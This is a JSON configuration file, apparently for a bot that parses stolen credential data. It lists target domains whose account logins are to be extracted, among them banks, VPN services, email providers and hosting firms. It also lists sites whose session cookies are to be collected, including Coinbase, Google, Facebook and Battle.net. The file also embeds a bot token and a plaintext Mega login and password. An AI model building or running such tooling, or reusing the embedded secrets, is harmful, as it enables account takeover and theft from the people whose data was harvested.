{
  "BaseFolder": "/home/f0ll/bot",
  "Bot": {
    "Token": "6830847941:AAHLAYW8s1JsbB1efN8qEGCh38BcsMi9mKk"
  },
  "Mega": {
    "Login": "f0ll@proton.me",
    "Password": "15037621aQSW!@"
  },
  "ParsingConfig": {
    "Accounts": {
      "manual": [
        "mega.nz",
        "runescape.com",
        "office-discount.de",
        "bueroshop24.de",
        "purevpn.com",
        "usa.ingrammicro.com",
        "voelkner.de",
        "hawesko.de",
        "whiskyzone.de",
        "922proxy.com",
        "sfr.fr",
        "surfshark",
        "vonage.com",
        "onet.pl",
        "o2.pl",
        "wp.pl",
        "abv.bg",
        "tibia.com",
        "freevpnplanet.com",
        "orange.fr",
        "de.rs-online.com",
        "windscribe",
        "poshmark.com",
        "mullvad.net",
        "clicksend.com",
        "commbank.com.au",
        "euroaion.com",
        "geschaeftskunden.dhl.de",
        "hetzner.com",
        "nexmo.com"
      ]
    },
    "Cookies": [
      {
        "Domains": [
          "twitter.com"
        ]
      },
      {
        "Domains": [
          "x.com"
        ]
      },
      {
        "Domains": [
          "facebook.com"
        ]
      },
      {
        "Domains": [
          "instagram.com"
        ]
      },
      {
        "Domains": [
          "kleinanzeigen.de"
        ]
      },
      {
        "Domains": [
          "twitch.tv"
        ]
      },
      {
        "Domains": [
          "youtube.com",
          "google.com"
        ],
        "OneFile": true
      },
      {
      	"Domains": [
      	  "coinbase.com"
      	]
      },
      {
      	"Domains": [
      	  "battle.net"
      	]
      }
    ],
    "Links": [
    ]
  }
}
